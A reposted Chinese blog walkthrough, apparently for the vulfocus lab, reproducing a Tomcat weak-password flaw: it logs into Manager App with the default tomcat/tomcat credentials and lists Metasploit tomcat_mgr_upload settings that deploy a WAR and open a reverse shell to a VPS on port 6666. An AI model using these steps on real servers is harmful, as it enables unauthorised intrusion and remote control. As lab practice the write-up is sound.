码上欢乐
相关内容   简体   繁体

Tomcat弱口令

本文转载自  查看原文  2022-01-10 15:11  890 

背景:
Zab Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell。

漏洞编号:

影响版本:
弱口令

复现步骤:
1,打开漏洞环境vulfocus

2,访问URL点击Manager App

3,验证弱口令,输入默认账号密码tomcat tomcat

4,使用msf进入exploit/multi/http/tomcat_mgr_upload模块

5,依次设置

set rhost vulfocus.fofa.so
set rport 60231
set httpusername tomcat
set httppassword tomcat
set lhost VPS IP
set lport 6666

6,run

7,查看flag


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 Tomcat8弱口令+后台getshell 漏洞复现-tomcat弱口令getshell Tomcat弱口令+后台getshell简单复现 Tomcat弱口令爆破+war部署getshell tomcat弱口令漏洞_爆破工具_后台拿shell tomcat8+ 弱口令 && 后台getshell 漏洞复现 16.Tomcat弱口令 && 后台getshell漏洞 弱口令检测 BUUCTF Misc 弱口令 漏洞挖掘之弱口令
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM